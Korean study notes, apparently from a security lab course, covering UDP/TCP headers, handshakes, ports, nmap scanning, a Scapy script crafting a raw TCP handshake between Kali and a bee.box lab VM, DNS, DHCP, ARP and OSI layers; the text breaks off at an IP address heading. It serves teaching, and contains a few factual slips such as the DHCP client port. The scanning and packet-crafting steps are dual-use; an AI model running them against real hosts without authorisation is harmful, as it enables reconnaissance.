UDP 설명

• 인터넷 프로토콜 스위트의 주요 프로토콜 가운데 하나로, 데이터그램으로 알려진 단문 메시지를 교환하기 위해서 사용
• 연결을 설정하지 않고 수신자가 데이터를 받을 준비를 확인하는 단계를 거치지 않고 단방향으로 정보 전송
  • 신뢰성 - 수신자가 메시지를 수신했는지 확인할 수 없음
  • 순서 정렬 - 메시지 도착 순서를 예측할 수 없음
  • 부하 - TCP보다 속도가 일반적으로 빠르고 오버헤더가 적음

• 8바이트로 고정
• 출발지 포트, 목적지 포트 : 16비트로 65,536개
• 길이 : UDP 페이로드와 UDP 헤더를 더한 데이터 그램의 크기
• 오류검사 : 기본적으로 비활성화

중간에 데이터가 유실되거나 손상되어도 크게 중요하지 않은 프로토콜에 많이 사용한다. 게임, 스트리밍 방송에서 사용하는데 이는 데이터가 빠짐없이 전송되는 것보다는 빠른 응답속도가 중요하기 때문이다.

2. TCP(Transmission Control Protocol, 전송 제어 프로토콜)

TCP 설명

• 일련의 옥텟을 안정적으로, 순서대로, 에러 없이 교환
• 전송 계층에 위치
• 네트워크의 정보 전달을 통제하는 프로토콜
• 연결 지향형 프로토콜
• 흐름 제어
• 에러 제어
• 데이터의 확실한 전송 보장

• TCP 헤더의 크기는 가변적
  • TCP Options에 따라 달라지고 Offset에서 지정
• 출발지와 목적지 포트
  • 16비트로 65.536
• 일련번호(Sequence Number)
  • 전송하는 데이터의 순서를 의미
  • 수신 측에서 쪼개진 세그먼트의 순서를 파악해서 재조립할 수 있도록 제공
  • 최초로 데이터를 전송할 때는 랜덤한 수로 초기화
  • 자신이 보낼 데이터의 1바이트당 일련번호를 1식 증가시켜서 데이터의 순서를 표현
• 확인 또는 승인 번호(Knowledgement Number)
  • 수신자가 예상하는 다음 일련번호를 의미
  • 데이터를 주고받을 때는 상대방이 보낸 일련번호 + 자신이 받은 데이터의 바이트 수를 확인 번호로 설정
  • 연결 설정과 연결 해제 과정에서는 상대방이 보낸 일련번호 + 1을 확인 번호로 설정
  • 핸드쉐이킹 과정에서는 데이터를 주고받지 않음
• 오프셋
  • 전체 세그먼트에서 헤더가 아닌 데이터가 시작되는 위치를 표시
  • 세그먼트 - TCP 헤더 + TCP 페이로드
  • 데이터가 시작되는 위치 - TCP 헤더의 끝 - TCP 헤더의 크기가 가변적이므로 필요
• TCP 플래그 : 현재 세그먼트 속성
  • CWR(Congestion Window Reduced) - 혼잡 윈도우 크기 감소 신호
  • ECN(Explicit Congestion Notification) - 혼잡 신호 발생
  • URG(Urgent) - 긴급 데이터
  • ACK(Acknowledgement) - 확인 응답 신호
  • PSH(Push) - 수신 측에 데이터를 최대한 빠르게 응용 프로그램에 전달
  • RST(Reset) - 연결을 강제로 초기화해달라는 요청
  • SYN(Synchronize) - 연결을 생성
  • FIN(Finish) - 연결을 종료
• 윈도우 크기
  • 슬라이딩 윈도우(Sliding Window) 크기는 한 번에 전송할 수 있는 데이터의 양(크기)
• 오류 검사
  • 데이터 송수신 중에 발생하는 오류를 검출하기 위해 사용
• 긴급 포인트
  • URG 플래그가 설정된 경우, 해당 데이터를 우선 처리

1) 정상적인 트래픽 전송 과정

최초의 시퀀스 넘버는 랜덤한 수로 초기화한다. 최초의 시퀀스 넘버를 5000, 데이터 크기를 500으로 가정하면 두 번째 데이터의 시퀀스 넘버는 5500이되고, 두 번째 데이터의 크기는 600이면 세 번째 시퀀스 넘버는 6100이 된다.

SN과 Data Size를 전송하면 AN을 돌려주는데 AN은 SN + Data Size이다. 

2) 비정상적인 트래픽이 전송되는 과정

SN과 Data Size를 합쳐서 5500을 보냈는데 AN으로 5200이 오면 불일치가 되어 처음 보냈던 트래픽을 다시 보내는데 SN과 Data Size의 합과 AN이 같을 때까지 다시 전송한다.

3. 포트 번호

• 16비트(65,536개를 표현하는 것이 가능)로 구성된 가상적 주소
• 운영체제에서 응용 계층에 속하는 프로토콜을 고유한 식별자 번호로 인식할 때 사용하는 번호
• IANA기구에서 관리
• 잘 알려진 포트 번호(well known port)
  • 0 ~ 1023
  • 잘 알려진 특정 애플리케이션의 사용을 위해 ICANN에서 할당한 포트
  • 일반적으로 서버에서 사용
  • C:\Windows\system32\drivers\etc\services에서 확인
  • ftp - 21/tcp,FTP control
  • ssh - 22/tcp, SSH Remote Login Protocol
  • telnet - 23/tcp
  • smtp - 25/tcp, Simple Mail Transfer Protocol
  • domain - 53/tcp, Domain Name Server
  • domain - 53/udp, Domain Name Server
  • http - 80/tcp, World Wide Web
  • pop3 - 110/tcp, Post Office Protocol - Version 3
  • https - 443/tcp, Http over TLS/SSL
• 등록된 포트 번호(Registered port)
  • 1024 ~ 49151
  • 특정 용도로 사용되기 위해 등록된 포트 번호
  • 1433 - MSQSQL
  • 3306 - MySQL
  • 8080 - HTTP (개발용도)
• 사설 또는 동적 포트 번호(Dynamic port)
  • 49152 ~ 65535
  • 어느 프로그램에서나 사용할 수 있는 포트

4. 포트 스캔

원격지 호스트를 대상으로 어떤 포트를 사용하고 있는지 확인하는 기법

• nmap
  • 오픈소스 기반의 포트 스캐닝 도구

1) Kali에서 namp 

80/tcp 포트로 서비스 중인 것을 볼 수 있다.

9999/tcp 포트로 서비스 하지 않는 것을 볼 수 있다.

사용 방법은 "nmap -p 스캔할_포트_번호 호스트"로 사용한다.

5. TCP 연결 설정(3-way handshaking)

모든 통신의 시작은 클라이언트부터 시작한다. 클라이언트가 TCP 플래그 SYN를 1로 설정해서 보낸다. 클라이언트가 SYN를 보낼 때 seq를 100으로 설정해서 보내면, 서버는 그 포트가 대기 중인 것을 확인하면 SYN-ACK를 보내는데 이때 ack는 클라이언트에서 받은 seq에 + 1 해서 ack를 보낸다. 서버가 보내는 seq는 서버가 클라이언트에게 주는 데이터의 순서를 나타낸다.

수신자 AN는 송신자 SN + Data Size or 1이 되고, 송신자 AN는 수신자 SN + Data Size or 1이 되므로 상호 교차 검증이 된다. 클라이언트가 보낸 것은 서버에서 넘어오는 ack를 이용해서 정상적으로 전송되었다는 것을 판단할 수 있다. 클라이언트가 다음에 보낼 seq와 차이가 나면 중간에 소실 되었다는 것을 알 수 있고, 소실 되었다면 재전송을 한다.

마지막으로 클라이언트는 서버에서 보낸 SYN-ACK를 확인했다는 ACK를 보낸다. 이때 seq는 서버에서 보낸 ack와 같다.

ack는 서버에서 준 seq에 +1 한 값이다. 이 값이 확인되면 서버는 자신이 보낸 SYN-ACK 패킷을 잘 받았다는 것을 확인하는 것이다.

6. 트래픽 흐름제어

이러한 데이터가 있을 때 위에서처럼 한 번씩 주고받으면 비효율적이다. 수신만 하다가 설정해 놓은 버퍼 크기만큼 데이터를 받으면 거기에 대해서 응답을 줄 수 있다. 윈도우 사이즈는 조절할 수 있다.

윈도우 사이즈를 설정해서 처리할 수 있는 만큼 받아들이고, 자원의 상황에 따라 크기가 크다면 줄여서 받을 수 있다.

데이터를 받는 중에 오류가 발생하면 데이터가 전부 오지 않는다. 이것을 어떻게 알 수 있는가 하면 다음에 나오는 SN가 앞에서 나오는 SN에 내가 받는 데이터의 크기를 더한 값이다. 그런데 오류가 발생한 SN과 수신한 데이터를 더해서 다음 SN을 비교하면 SN이 일치해야 하는데 일치하지 않기 때문에 오류가 발생해서 데이터가 전부 오지 않는 것을 알 수 있다.

그러면 수신에서 다시 SN 5800을 다시 요청하고 수신이 완료되면 AN 7200을 리턴해 다음 데이터를 보내라는 응답을 보낸다.

7. 연결 종료(4-way handshake)

클라이언트가 종료할 때 FIN을 보내고 서버에서 FIN-ACK를 보내는데, ACK를 보낼 때 약간의 텀이 생긴다. 이는 연결 시점에 만들어 놓은 채널을 close 해야 하기 때문이다. 서버 입장에서는 자원이므로 자원을 해제해야 한다. close가 완료되면 서버는 종료 준비 완료가 되었다는 FIN을 보낸다. FIN을 받은 클라이언트는 알았다는 응답을 전달하고 연결을 종료한다.

8. TCP 동작

• 응용 계층에서 페이로드를 생성하고, 전송 전에 3단계 연결 설정을 수행
  • 응용 계층에서 생성한 페이로드를 응용 계층 버퍼에 임시 보관하고 전송 계층에서 SYN 신호를 담은 세그먼트 한 개를 생성
  • SYN 세그먼트는 네트워크 계층, 데이터 링크 계층, 물리 계층을 통과 해서 수신지로 전달
  • 수신 측에서는 해당 SYN 신호를 전송 계층까지 끌어올린 후 전송 계층에서 SYN/ACK 신호를 담은 세그먼트를 생성해서 송신지로 전달
  • 송신 측에서는 해당 SYN/ACK 신호를 전송 계층까지 끌어올린 후 전송 계층에서 ACK 신호를 담은 세그먼트를 생성해서 수신지로 전달해서 3단계 설정을 완료
• 3단계 연결 설정이 완료되면 운영체제는 응용 계층 버퍼에 저장했던 TCP 페이로드를 전송 계층으로 전달
• 전송 계층은 응용 계층에서 전달된 TCP 페이로드를 대상으로 단편화 수행
  • 단편화(Fragmentation)
    • 전송 효율성과 데이터 기밀성을 위해 TCP 페이로드를 여러 개로 분할하는 기법
• 단편화가 끝나면 조각난 페이로드 앞에 출발지 포트와 목적지 포트 등을 담은 헤더가 붙으면서 여러 개의 세그먼트를 생성하고, 각 세그먼트는 네트워크 계층으로 넘어 가면서 각각의 패킷을 생성

9. IP 헤더

네트워크 계층(L3)에서 각 세그먼트/데이터그램 앞에 IP 주소를 추가한 것

• 일반적으로 IP 헤더는 20바이트 크기를 사용
• IP Option 항목을 이용해 21바이트 이상으로 사용이 가능
• 서비스 종류(Type of Service)
  • 해당 패킷의 전송 우선순위를 지정
  • 회선이 혼잡할 경우 패킷의 전송 우선순위를 부여할 때 사용
• 전체 길이
  • IP 헤더를 포함한 패킷 전체의 길이
• Identification, IP Flags, Fragment Offset
  • MTU(Ma,imum Transmission Unit : 최대 전송 단위)에 따른 패킷 분할 정보
• IP Flags
  • 패킷 분할 여부 표시
  • D : Do not fragment
  • M : More fragment
• MTU 1500 바이트인 이더넷 구간을 1400 바이크 크기의 패킷이 통과하는 경우
  • 패킷 분할 없음
• MTU 1500 바이트인 이더넷 구간을 5900 바이트 크이의 패킷이 통과하는 경우
  • 패킷 분할이 발생
• 생존 시간
  • 해당 패킷이 통과할 수 있는 라우터의 개수
• 프로토콜
  • 상위 계층에 속한 프로토콜 번호
  • 수신 측에서 해당 패킷의 속성을 파악하는데 사용
• 헤더 오류 검사
  • 비활성화 상태
• 출발지 IP 주소, 목적지 IP 주소
  • 32비트의 IP 주소

10. Scapy 이용한 3-Way Handshking

• Scapy
• 파이썬으로 제작된 패킷 조작 프로그램
• 패킷 챕처, 전송, 수정, 디코딩 등의 다양한 기능 제공

1) ls()

• 지원하는 프로토콜 전체 목록

(1) ls(TCP)

• 현재 설정된 TCP 헤더 정보 출력
• ls(프로토콜 이름)
  • 해당하는 이름의 프로토콜 헤더 정보 출력

2) TCP 정보

(1) TCP().display()

(2) TCP().show()

• 위에 했던 내용과 같지만 보여지는 형식이 다름

3) IP 헤더 정보 출력

(1) IP().show()

IP().show() 하는 것과 IP에 인스턴스 변수를 만들고 show 하는것은 같다.

4) 현재 IP 헤더의 목적지 주소 변경

• scr = kali.linux 가상머신 IP 주소
• dst = bee.box 가상머신 IP 주소

• 생성자에 매매변수의 값을 설정하는 방법으로 초기화

5) 스니핑(sniffing)

• 시간이 경과한 후 Ctrl + C
• 스니핑 결과를 요약 출력

• S : 연결 유청
• SA : 연결 수락
• A : 연결 수락 확인

• 인덱스 24번의 패킷 상세 조회

• 캡처할 패킷의 개수 지정

11. VSCode 설치

$ sudo apt-get install wget gpg

$ wget -qO- https://packages.microsoft.com/keys/microsoft.asc | gpg --dearmor > packages.microsoft.gpg

$ sudo install -D -o root -g root -m 644 packages.microsoft.gpg /etc/apt/keyrings/packages.microsoft.gpg

$ sudo sh -c 'echo "deb [arch=amd64,arm64,armhf signed-by=/etc/apt/keyrings/packages.microsoft.gpg] https://packages.microsoft.com/repos/code stable main" > /etc/apt/sources.list.d/vscode.list'

$ rm -f packages.microsoft.gpg

$ sudo apt install apt-transport-https

$ sudo apt update

$ sudo apt install code

위 명령어를 순서대로 입력해 VSCode 설치한다.

12. Scapy로 구현

kali 가상머신에서 Bee.box 가상머신으로 연결(3-way handshaking) 하는 것을 구현

• sport
  • 1024 이후의 임의 포트로 설정
• flags
  • SYN(연결요청)

• sprot를 1024부터 65535 중 랜덤으로 설정

• bee.box 가상머신 IP 주소로 변경

• TCP 세그먼트에 IP 헤더를 덧붙여 SYN 패킷 생성

• 전송하고 첫 번째 응답이 올 때까지 대기

13. handshaking.py

kali 가상머신에서 handshaking.py 파일 만들고 실행

from scapy.all import * 

# tcp = TCP()
# tcp.sport = RnadNum(1024, 65535)
# tcp.dport = "80"
# tcp.flags = "S"
tcp = TCP(sport=RandNum(1024, 65535), dport=80, flags='S')


# ip = IP()
# ip.src = "192.168.40.129"
# ip.dst = "192.168.40.130"
ip = IP(src="192.168.40.129", dst="192.168.40.130")

syn = ip / tcp 

syn_ack = sr1(syn)

ack = ip / TCP(sport=syn_ack[TCP].dport, dport=syn_ack[TCP].sport, flags="A", seq=syn_ack[TCP].ack, ack=syn_ack[TCP].seq+1)

send(ack)

1) wireshark 실행한 상태에서 handshaking.py 실행

2) RST 패킷이 자동으로 전달되는 이유

일반적인 프로그램들은 운영체제를 통해서 패킷이 나가는데 스카피는 자기가 그냥 전송하는 것이다. 갑자기 bee.box서버에서 SYN-ACK가 들어오는 것이다. 갑자기 알 수 없'는 SYN-ACK가 들어오니까 kali에서 리셋 시키는 것이다. 

그것 때문에 운영체제가 보내는 리셋이 섞여서 나온다. 이런식으로 리셋이 나오면 bee.box 서버에서는 재연결을 시도한다. 그러면 패킷 분석이 어려워지기 때문에 iptables과 갈은 방화벽에 리셋 패킷이 나가는 것을 막는다.

3) RST 패킷이 나가지 않도록 방화벽에 룰 추가

iptables 리스트를 보면 아무 룰도 적용되어 있지 않다.

위 IP는 kali IP다.

wireshark를 실행하고 다시 handshaking.py를 실행하면 RST가 나오지 않는 것을 확인할 수 있다.

1) naver.com 도메인 정보 조회

dig 사용법은 "dig 도메인이름 [레코드유형]" 이다.

QUESTION SECTION이 질의 내용인데, www.naver.com 도메인 이름으로 A 유형의 레코드를 질의한 것이다. 

ANSWER SECTION이 질의 결과로 1개의 CNAME과 4개의 A 레코드가 조회된 것이다.

2) blog.naver.com SOA 조회

• gns1.nheos.com.
  • Primary Name Server
• hostmaster.nheos.com.
  • 관리자 이메일 주소
  • hostmaster@nheos.com 의미
• 2024040404
  • 시리얼 번호
• 10800
  •  Refresh 값 
  • 3시간 주기로 Secondary DNS가 Zone Transfer 수행
• 3600
  • Retry 값
  • Secondary DNS가 응답받지 못 하면 1시간 후 재시도
• 604800
  • Expire 값
  • 7일 동안 Secondary DNS가 응답받지 못하면 더 이상 해당 Zone 파일을 Secondary DNS에서 사용하지 않음
• 180
  • SOA 레코드 TTL(Time To Live) 값
  • DNS Resolver에서 캐시 되는 시간 (180초)

2. DHCP(Dynamic Host Configuration Protocol, 동적 호스트 구성 프로토콜)

• 호스트의 IP 구성 관리를 단순화하는 IP 표준
• IP 주소와 관련된 기타 구성 정보(Subnet mask, Gateway IP 주소, DNS 서버 IP 주소 등)를 DHCP 클라이언트에게 동적으로 할당하는 서비스
• 사용자 이동이 많고 한정된 IP 주소를 가진 경우 유용
• 서비스 포트
  • 서버 67(bootps)
  • 클라이언트 38(bootpc)

1) DHCP 동작(4단계)

• Discover
  • 네트워크상에 DHCP 서버를 찾기 위해서 Broadcast 요청
• Offer
  • DHCP 서버가 클라이언트에게 어떠한 IP 사용 제안
• Request
  • 클라이언트가 서버로부터 제안받은 정보를 사용하겠다는 요청
• Ack
  • Request에 대한 요청 수락

2) DHCP 갱신

• DHCP 서버로부터 IP를 할당받은 후 임대 시간(Lease Time)의 50%가 지나면 DHCP 갱신 과정을 수행
• 이미 사용 중인 IP 정보가 있으므로 DHCP Discover, DHCP Offer 과정은 생략
• 첫 번째 갱신에 실패하면 남은 시간의 50%가 지난 시점(즉, 초기 임대 시간의 75%가 지난 시점)에 다시 갱신 시도
• 두 번째 갱신에 실패하면 추가 생신 없이 임대 시간이 모두 지난 시점에 IP를 반납하고 처음부터 다시 IP를 할당받음

3. MAC Address(Media Access Control Address, 물리적 주소)

• 네트워크 세그먼트의 데이터 링크 계층(L2)에서 통신을 위한 네트워크 인터페이스에 할당된 고유 식별자
• LAN 카드(NIC)에 새겨진 주소(BIA, Burned-In Address)
• 48bit
  • OUI(Organizationally unique identifier, 24bit)
    • IEEE가 제조사에 할당(제조사 코드)
  • UAA(Universally Administered Address, 24bit)
    • 각 제조사에서 네트워크 구성 요소에 할당(기기 고유 코드, 일련번호)
• LAN 영역에서 내부 통신을 수행하기 위해 필요한 주소

1) MAC 주소 동작

데이터 링크 계층에서는 출발지 MAC 주소, 목적지 MAC 주소, DATA의 형태로 네트워크에 보낸다. 이때, 목적지 MAC 주소가 자신의 것이라면 들어오는 패킷을 읽어서 위 계층으로 전달한다. 목적지 주소가 자신의 것이 아니라면 없애버린다.

2) 무차별 모드(Promiscuous Mode)

• 기본적으로 NIC는 패킷의 목적지 MAC 주소가 자신의 MAC 주소와 다르면 폐기
• 무차별 모드로 NIC를 구성하면 자신의 MAC 주소와 상관없는 패킷이 들어와도 이를 분석할 수 있도록 메모리에 올려 처리할 수 있게 함
• 네트워크 상태를 모니터링하거나 디버깅, 분석 용도로 네트워크 전체 패킷을 수집해야 하는 경우 사용

3) IP 주소와 MAC 주소

4. ARP(Address Resolution Protocol, 주소 결정 프로토콜)

• 네트워크상에서 IP 주소를 MAC 주소로 대응시키기 위해 사용되는 프로토콜
• 상대방의 MAC 주소를 알아내기 위해 사용되는 프로토콜
• 데이터 통신을 위해 2계층의 MAC 주소와 3계층 IP 주소 두 개를 사용
  • IP 주소 체계는 MAC 주소와 전혀 연관성이 없으므로 두 주로를 연계시켜 주는 메커니즘이 필요
  • 그 메커니즘이 APR

1) ARP 헤더

(1) Hardware Type

• 하드웨어 주소(MAC) 유형을 나타내며, 이더넷 통신 시 항상 1로 설정

(2) Protocol Type

• 맵핑 대상인 프로토콜 주소의 유형을 나타내며 IPv4의 경우 0x0800으로 설정

(3) Hardware Address Length

• 하드웨어 주소(MAC)의 길이를 byte로 나타내고, 이더넷 상에서 6으로 설정

(4) Protocol Address Length

• 프로토콜 주소의 길이를 byte로 나타내고, IPv4의 경우 4로 설정

(5) Operation Code(Opcode)

• ARP의 구체적인 동작
• 1 : ARP Request
• 2 : ARP Reply
• 3 : RARP Requet
• 4: RARP Rely

(6) Source Hardware Address

• 송신자의 MAC 주소

(7) Source Protocol Address

• 송신자의 IP 주소

(8) Target Hardware Address

• 수신자의 MAC 주소, ARP Request 동작 시 0으로 설정
• 이더넷 헤더의 목적지 주소가 FF;FF;FF;FF;FF;FF로 설정되면 브로드캐스팅

(9) Target Protocol Address

• 수신자의 IP 주소

2) ARP 동작

(1) 목적지 MAC 주소를 모르기 때문에 정상적인 패킷을 만들 수 없음

(2) ARP 요청을 네트워크에 브로드캐스트(ARP Request)

목적지 MAC 주소를 브로드캐스트(FF:FF:FF:FF:FF:FF)로, 대상 MAC 주소를 00-00-00-00-00-00으로 채워서 전달

앞 브로드캐스트는 이더넷 헤더, 뒤 MAC 주소는 ARP 헤더다.

브로드캐스트는 목적지가 정해져 있지 않은 것으로 해당하는 네트워크에 전체에게 보내는 것이다.

전송자 MAC부터는 ARP Request 패킷이다. 이때 대상자 MAC을 체크하는데 00으로 되어 있으면 ARP Request이므로 대상자 IP를 확인한다. 대상자 IP를 보고 자신의 MAC IP 주소와 일치하는지 아닌지를 판단해서 자신의 주소와 일치하면 유니캐스트 한다.

(3) 출발지로 ARP 응답을 유니캐스트(ARP Reply)

ARP 요청에 있는 대상자 IP 주소가 자신의 IP와 동일한 경우, 출발지로 ARP 응답을 유니캐스트 한다.

유니캐스트는 목적지가 하나로 정해져 있는 것이다.

이더넷 헤더의 출발지 MAC 주소가 자신의 것으로 설정하고 목적지 MAC 주소는 Request를 요청한 주소로 설정한다.

전송지 정보는 Request의 대상자 정보가 들어가고, 대상자 정보는 Request의 전송자 정보가 들어간다.

(4) ARP 캐시 테이블 갱신 후 패킷 전송

처음에는 목적지 MAC을 몰랐기 때문에 브로드캐스트 했다. 이제 로컬에 있는 캐시 테이블에 MAC 주소를 업데이트하고 패킷을 완성해서 데이터를 전송한다.

5. ARP 캐시 테이블 

패킷을 보낼 때마다 ARP 브로드캐스트를 수행하면 네트워크 통신의 효율성이 크게 저하되므로 ARP Reply 정보를 메모리에 정보를 저장해서 재사용하도록 하는 것

• arp -d
  • arp 캐시 테이블 삭제
• ping 8.8.8.8
  • 구글 DNS
• arp -a
  • ARP 캐시 테이블 확인
• 192.168.150.130
  • 해당 호스트의 IP 주소
• 192.168.150.2
  • 기본 게이트웨이의 NIC

6. ping 8.8.8.8 동작 순서

1) 출발지 IP와 목적지 IP의 네트워크 ID 비교

출발지의 Subnet mask를 적용해서 Network ID를 비교한다. 비교해서 서로 다르면 목적지 주소를 게이트웨이 주소로 변경한다.

2) 게이트웨이의 MAC 주소 확인을 위해 ARP Request 브로드캐스팅

브로드캐스팅 한다는 것은 목적지 MAC이 설정되지 않음을 뜻함

LAN 영역의 모든 호스트는 ARP 브로드캐스팅 질의를 수신 목적지 IP 주소가 일치하는 호스트가 ARP Reply를 전송한다.

3) 게이트웨이가 자신의 MAC 주소 유니캐스트

4) 응답받은 출발지 호스트는 자신의 ARP 캐시 테이블 업데이트

5) MAC 주소 이용해서 유니캐스팅

이후부터는 게이트웨이와 통신하기 위해서는 로컬 ARP 캐시 테이블에 MAC 주소를 이용해서 유니캐스팅

7. ARP 영역

ARP 요청과 응답이 일어나는 영역

ARP 요청과 응답은 같은 네트워크에서 즉, LAN 영역 일어난다.

LAN 영역이란 동일한 네트워크 ID를 공유하는 호스트가 MAC 주소에 기반해서 스위칭 방식으로 내부 통신을 수행하면서 단일 ARP 영역을 생성하는 공간이다.

1) 데이터 전송할 때 사용하는 통신 방식

(1) 유니캐스트

• 1 : 1
• 출발지와 목적지가 1 : 1로 통신
• 대부분의 통신은 유니캐스트 방식으로 진행
• TCP, UDP 모두 지원

(2) 브로드캐스트

• 1 : All
• 동일 네트워크에 존재하는 모든 호스트가 목적지
• 목적지 주소가 All(FF-FF-FF-FF-FF-FF)으로 표기된 통신 방식
• 로커 네트워크에서 모든 호스트에 패킷을 전달해야 할 때 사용
• 유니캐스트 통신전에 상대방의 MAC 주소를 취득하기 위해 사용 - ARP Request
• UDP 지원

(3) 멀티캐스트

• 1 : N (멀티캐스트 구독 호스트 = 그룹) 
• 하나의 출발지에서 다수의 특정 목적지로 데이터를 전송
• 멀티캐스트 그룹 주소를 이용해서 해당 그룹에 속한 다수의 목적지로 패킷을 전송하기 위한 통신 방식
• IPTV와 같은 실시간 방송, 사내 방송, 증권 시세와 같은 단방향으로 다수에게 동일한 내용을 전달할 때 사용 
• UDP 사용

(4) 애니캐스트

• 1 : 1 (동일 그룹 내의 1개 호스트)
• 다수의 동일 그룹 중 가장 가까운 호스트에서 응답
• 애니캐스트 주소가 같은 호스트 중 가장 가깝거나 효율적으로 서비스할 수 있는 호스트와 통신하는 방식
• 가장 가까운 DNS 서버를 찾을 때 사용

8. 계층(layer)

• 비음성 통신에서 데이터를 전송하기 위한 일련의 좌정, 단계, 절차
• 송신자 운영체제가 응용 계층에서 시작해 전송, 네트워크, 데이터 링크 계층 순으로 데이터를 전송
• 수신자 운영체제가 역으로 물리 계층에서 시작해 데이터 링크, 네트워크, 전송, 응용 계층 순으로 데이터를 수신

1) ISO OSI 7 Layer

ISO(International Organization for Standardization, 국제 표준 기구)에서 서로 다른 시스템(개방형 시스템, Open System) 간 통신을 허용(상호 연결, Inter Connection)하기 위해 만든 모델 OSI(Open System Interconnection)

(1) L7 응용 계층

• 애플리케이션 프로세스를 정의하고 애플리케이션 서비스를 수행
• User Interface 제공
  • UI를 통해 데이터 생성
  • HTTP, FTP, Telnet, SMTP, SNMP, NFS 등

(2) L6 표현 계층

• 표현 방식이 다른 애플리케이션이나 시스템 간의 통신을 돕기 위해 하나의 통일된 구문 형식으로 변화하는 기능
  • 코드 변환(encoding)
  • 압축(compression)
  • 암호화(encryption)

(3) L5 세션 계층

• 응용 프로그램 간에 데이터 전송을 위한 동기화, 데이터의 오류검사 및 복구 기능 수행
• 서비스 제공자와 요청자 간을 연결하고 대화를 개시하는 역할

(4) L4 전송 계층

• 프로세스와 프로세스 간의 전달(Process-to-process segment delivery)
• 가상 회선 설정, 유지, 해지
• 상위 계층 프로세스에 신뢰성 있게 전달하는 역할
  • 신뢰성은 확인응답 등을 통해 오류 검사를 한다는 의미
• 패킷이 유실되거나 순서가 바뀌었을 때 바로잡아 주는 역할(미비점을 해소하기 위한 역할)
  • 시퀀스 번호 - 패킷을 보내는 순서 명시
  • ACK 번호 - 받는 순서 명시
• 로드 밸런서, 방화벽
• 주요 기능
  • 서비스 지점 주소 지정
  • 분할과 재조립
  • 연결 제어
  • 흐름 제어
  • 오류 제어

(5) L3 네트워크 계층

• 호스트 간의 데이터 전송 기능(Host-to-host packet delivery)
• 데이터의 전송 경로 설정
• 최적 경로 결정(routing)
• 라우터(router)
  • IP 주소를 사용해 최적의 경로를 찾아서 패킷을 전송하는 역할의 장비
• 서로 다른 네트워크로 구성된 인터네트워킹을 통해 올바른 데이터 경로를 보장

(6) L2 데이터 링크 계층

• 인접 노드 사이의 데이터 전송 기능 수행(Node-to-node frame delivery)
• 전기 신호를 모아 우리가 알아볼 수 있는 데이터 형태로 처리
• NIC, 스위치
• 프레임을 생성하고 전송하는 방법을 규정
• 주요 임무
  • 헤더와 트레일러를 붙여서 프레임 구성
  • 물리주소 지정
  • 흐름 제어
  • 오류 제어
  • 접속 제어
• 대표적인 프로토콜
  • HDLC(High-level Data Link Control)
  • PPP(Point-to-Point Protocol)

(7) L1 물리 계층

• 물리적인 전송로 제공
• 전기적, 기계적, 기능적, 절차적 수단 제공
• 주소 개념이 없기 때문에 전기 신호가 들어온 포트를 제외하고 모든 포트에 같은 신호를 전송
• 허브, 리피터, 케이블, 커넥터, 트랜시버, 탭

9. 네트워크 장비에서 패킷 전송 방법

• Forwarding
  • 하나의 송신지 포트에서 하나의 수신지 포트로 트래픽 전달
• Flooding
  • 송신지 포트를 제외한 나머지 포트들로 트래픽 전달

1) Hub

• L1 물리 계층 장비
• 주소가 없으므로 모든 포트로 Flooding 처리

2) Switch

• L2 데이터 링크 계층
• MAC Address Table을 이용해서 Forwarding 처리
• MAC Address Table에 목적지 MAC 주소가 없는 경우 Flooding 처리

3) Router

• L3 네트워크 계층
• Routing Table을 기반으로 Forwarding 처리
• Routing Table에 없는 목적지 주소는 Drop 처리

10. 통신 체계와 통신 규약

독점적 프로토콜(Vender Specific Protocol)

• 특정 업체에서 개발한 프로토콜
• 다른 프로토콜과 호환이 불가능

비독점적 프로토콜(Open Protocol)

• 학교 또는 연구기관에서 개발
• 이기종 장비 간 통신이 가능
• TCP/IP, 802.3 등

1) TCP/IP

TCP/IP는 총 4계층으로 OSI 7 Layer의 75계층을 묶어 Application으로 사용하고, Transport, Internet, 21계층을 묶어 Network Interface 구성으로 프로토콜을 정의하고 있다.

11. 전송 데이터 구성

헤더3 + 헤더2 + 헤더1 + 페이로드

• 헤더
  • 보내는 호스트의 주소(출발지 주소)와 받는 호스트의 주소(목적지 주소)가 담긴 공간
• payload
  • 사용자가 상대방에게 전송하고자 하는 실제 정보가 담긴 공간
• 메시지
  • 페이로드만으로 이루어진 데이터 전송 단위

1) 인캡슐레이션 & 디캡슐레이션

(1) 인캡슐레이션

• 페이로드 앞에 헤더를 붙이는 과정
• 운영체제가 데이터를 송신하는 과정
• 메시지 > 데이터그램/세그먼트 > 패킷 > 프레임 > 비트
• 역할
  • 정보은닉
  • 라우터는 패킷 헤더만 읽을 수 있을 뿐 데이터그램/세그먼트 헤더 이하는 읽을 수 없음
  • 스위치는 프레임 헤더만 읽을 수 있을 뿐 패킷 헤더 이하는 읽을 수 없음

(2) 디캡슐레이션

• 헤더를 떼는 과정
• 데이터를 수신하는 과정
• 비트 > 프레임 > 패킷 > 데이터그램/세그먼트 > 메시지

2) 데이터그램 또는 세그먼트

데이터그램 헤더 + UDP 페이로드 또는 세그먼트 헤더 + TCP 페이로드

• 페이로드 앞에 붙는 첫 번째 헤더
• 출발지, 목적지 포트 번호를 포함
• 수신 측 운영체제에서는 데이터그램 또는 세그먼트 헤더에 담긴 포트 번호를 통해 페이로드의 내용이 어떤 종류의 서비스로 전달할지 판단
  • 송신 측 기준
    • 목적지 포트 - 일반적인 서비스 포트 번호를 사용
    • type C:\Windows|System32\drivers\etc\services 확인 가능
    • 출발지 포트 - 1024번 이후의 포트 번호 사용

3) 패킷

패킷 헤더 + 데이터그램 헤더 + UDP 페이로드 또는 패킷 헤더 + 세그먼트 헤더 + TCP 페이로드

(1) 패킷 헤더

• 데이터그램/세그먼트 앞에 붙이는 두 번째 헤더
• 출발지, 목적지 IP 주소 포함
• 라우터 장비가 라우팅 기능을 수행할 때 참조하는 부분

4) 프레임

프레임 헤더 + 패킷 헤더 + 데이터그램 헤더 + UDP 페이로드 + 트레일
프레임 헤더 + 패킷 헤더 + 세그먼트 헤더 + TCP 페이로드 + 트레일

(1) 프레임 헤더

• 패킷 앞에 붙이는 세 번째 헤더
• LAN 영역인 경우 MAC 주소 포함
• 스위치 장비가 스위칭 기능을 수행할 때 참조하는 부분
• LAN 영역과 WAN 영역에 따라 상이하게 설정

ipconfig 설명

운영체제에서 네트워크 인터페이스 설정을 확인하고 관리하는 데 사용되는 명령어다.

네트워크 인터페이스의 정보를 출력한다.

• IP 주소
• 서브넷 마스크
• 기본 게이트웨이
• MAC 주소
• DNS 서버 주소
• DHCP 서버 주소

1) IP(Internet Protocol) 주소

